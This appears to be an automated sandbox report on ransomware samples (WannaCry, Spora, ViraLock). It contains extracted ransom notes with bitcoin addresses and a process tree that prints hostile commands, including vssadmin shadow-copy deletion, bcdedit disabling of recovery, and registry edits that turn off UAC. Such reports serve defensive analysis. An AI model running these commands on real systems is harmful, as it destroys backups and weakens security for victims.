Analysis

  • max time kernel
    512s
  • max time network
    485s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    01-02-2025 14:51

General

  • Target

    detection.html

  • Size

    7KB

  • MD5

    60e328924b7b87dc5548518c888aaf62

  • SHA1

    66470e60ce1ff42244252240aa14f5eed1a826c5

  • SHA256

    5336e0393e352afe50f4740069dd7a071d74811b13dc47e8e79e6344ef27356f

  • SHA512

    71094efcef7f79aa47403c0a177b9e1b6ea5c1002bf8f751841d9025c3c9c97b20f0552dd412796d0fd4ca86492a1e5af95353ca22e6813e056ce0f1ce25bfb7

  • SSDEEP

    192:Ftsm1pT1cxgyv5AvnHeuAprvC7wtVAanvnvdUhW5QUPKyun7ne9GQ7pTT+T1Uu2:FPpOgyv50nHeuApLC7wtVAavvdKAZSbo

Malware Config

Extracted

Path

C:\Users\Admin\Documents\!Please Read Me!.txt

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions!
Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\@[email protected]

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 9 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 9 IoCs
  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Wannacry family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Disables Task Manager via registry modification
  • Drops startup file 5 IoCs
  • Executes dropped EXE 44 IoCs
  • Loads dropped DLL 23 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Drops file in System32 directory 64 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 4 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 25 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 28 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 14 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\detection.html
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2848
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffb6ec53cb8,0x7ffb6ec53cc8,0x7ffb6ec53cd8
      2⤵
        PID:4664
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
        2⤵
          PID:764
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3712
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
          2⤵
            PID:956
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
            2⤵
              PID:2632
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
              2⤵
                PID:2952
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
                2⤵
                  PID:1476
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
                  2⤵
                    PID:3372
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
                    2⤵
                      PID:2864
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
                      2⤵
                        PID:2580
                      • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5828 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1760
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3300 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3324
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
                        2⤵
                          PID:4848
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
                          2⤵
                            PID:1744
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
                            2⤵
                              PID:1216
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
                              2⤵
                                PID:1472
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:1
                                2⤵
                                  PID:856
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
                                  2⤵
                                    PID:4920
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6924 /prefetch:2
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4284
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6208 /prefetch:8
                                    2⤵
                                    • NTFS ADS
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3976
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,7486532205689848110,7987959379990115064,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3132 /prefetch:1
                                    2⤵
                                      PID:7160
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:2964
                                    • C:\Windows\System32\CompPkgSrv.exe
                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                      1⤵
                                        PID:2252
                                      • C:\Windows\System32\rundll32.exe
                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                        1⤵
                                          PID:2464
                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\SporaRansomware.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\SporaRansomware.exe"
                                          1⤵
                                          • Drops startup file
                                          • System Location Discovery: System Language Discovery
                                          PID:3052
                                          • C:\Windows\SysWOW64\wbem\WMIC.exe
                                            "C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"
                                            2⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1680
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\USC21-C9XAT-OTRTX-HTKTO.HTML
                                            2⤵
                                              PID:3440
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffb6ec53cb8,0x7ffb6ec53cc8,0x7ffb6ec53cd8
                                                3⤵
                                                  PID:1620
                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe"
                                              1⤵
                                              • Adds Run key to start application
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4536
                                              • C:\Users\Admin\TgkUYYAk\xgkkoAQU.exe
                                                "C:\Users\Admin\TgkUYYAk\xgkkoAQU.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Drops file in System32 directory
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: GetForegroundWindowSpam
                                                PID:4124
                                              • C:\ProgramData\KOcUocAg\fgMkMoUs.exe
                                                "C:\ProgramData\KOcUocAg\fgMkMoUs.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:3424
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                2⤵
                                                  PID:3912
                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                    C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4504
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                      4⤵
                                                        PID:2812
                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                          C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2024
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                            6⤵
                                                              PID:1068
                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2072
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                  8⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3200
                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                    9⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:4768
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                      10⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2496
                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                        11⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:8
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                          12⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3352
                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                            13⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:2356
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                              14⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:4512
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                15⤵
                                                                                  PID:3652
                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                                  15⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:2124
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                                    16⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1588
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock
                                                                                      17⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:4340
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock"
                                                                                        18⤵
                                                                                          PID:640
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                          18⤵
                                                                                          • Modifies visibility of file extensions in Explorer
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies registry key
                                                                                          PID:1000
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                          18⤵
                                                                                          • Modifies registry key
                                                                                          PID:1096
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                          18⤵
                                                                                          • UAC bypass
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies registry key
                                                                                          PID:2348
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            19⤵
                                                                                              PID:2112
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mSksUkIw.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                            18⤵
                                                                                              PID:1680
                                                                                              • C:\Windows\SysWOW64\cscript.exe
                                                                                                cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                                19⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4776
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                          16⤵
                                                                                          • Modifies visibility of file extensions in Explorer
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies registry key
                                                                                          PID:2148
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                          16⤵
                                                                                          • Modifies registry key
                                                                                          PID:1448
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                          16⤵
                                                                                          • UAC bypass
                                                                                          • Modifies registry key
                                                                                          PID:3552
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\toYAcoQw.bat" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Ransomware\ViraLock.exe""
                                                                                          16⤵
                                                                                            PID:3800
                                                                                            • C:\Windows\SysWOW64\cscript.exe
                                                                                              cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
                                                                                              17⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:6864
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
                                                                                        14⤵
